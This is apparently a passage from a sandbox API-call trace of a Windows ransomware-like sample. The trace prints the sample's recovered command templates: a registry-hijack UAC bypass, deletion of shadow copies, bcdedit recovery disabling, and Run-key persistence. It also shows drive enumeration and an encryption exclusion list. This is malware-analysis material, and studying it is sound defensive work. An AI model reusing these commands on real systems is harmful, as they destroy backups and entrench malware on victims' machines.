hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0116.468] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0116.469] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0116.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0116.470] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0116.471] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0116.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0116.472] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0116.473] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0116.474] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0116.475] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0116.475] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0116.475] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0116.475] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0116.475] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0116.475] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0116.475] LockResource (hResData=0x50d72c) returned 0x50d72c [0116.475] FreeResource (hResData=0x50d72c) returned 0 [0116.475] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.475] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.475] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.475] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.475] FreeResource (hResData=0x50d64c) returned 0 [0116.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.475] GetCurrentThreadId () returned 0xdf8 [0116.475] GetCurrentThreadId () returned 0xdf8 [0116.475] GetCurrentThreadId () returned 0xdf8 [0116.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0116.475] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0116.476] GetCurrentThreadId () returned 0xdf8 [0116.476] GetCurrentThreadId () returned 0xdf8 [0116.476] GetCurrentThreadId () returned 0xdf8 [0116.476] GetCurrentThread () returned 0xfffffffe [0116.476] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0116.476] GetLastError () returned 0x3f0 [0116.476] GetCurrentProcess () returned 0xffffffff [0116.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0116.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0116.476] CloseHandle (hObject=0xb8) returned 1 [0116.476] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0116.476] EqualSid (pSid1=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0116.476] EqualSid (pSid1=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0116.476] EqualSid (pSid1=0x216520*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0116.476] GetCurrentProcess () returned 0xffffffff [0116.476] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0116.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0116.476] GetLastError () returned 0x7a [0116.476] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x217790 [0116.476] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x217790, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x217790, ReturnLength=0x12fc64) returned 1 [0116.476] GetSidSubAuthorityCount (pSid=0x217798*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x217799 [0116.476] GetSidSubAuthority (pSid=0x217798*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2177a0 [0116.476] LocalFree (hMem=0x217790) returned 0x0 [0116.476] CloseHandle (hObject=0xb8) returned 1 [0116.476] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0116.476] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0116.476] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0116.476] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0116.477] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0116.478] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0116.478] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0116.478] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0116.478] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0116.478] LockResource (hResData=0x516824) returned 0x516824 [0116.479] FreeResource (hResData=0x516824) returned 0 [0116.479] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0116.479] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0116.479] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0116.479] LockResource (hResData=0x50d64c) returned 0x50d64c [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0116.479] FreeResource (hResData=0x50d64c) returned 0 [0116.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0116.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0116.479] GetCurrentThreadId () returned 0xdf8 [0116.479] GetCurrentThreadId () returned 0xdf8 [0116.479] GetCurrentThreadId () returned 0xdf8 [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0116.479] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.479] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.480] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="STYLE", cchCount1=5, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MP3", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FLAC", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OGG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WMA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JAVA", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CUR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_END]", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 2 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[ND_START]", cchCount2=10) returned 3 [0116.481] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 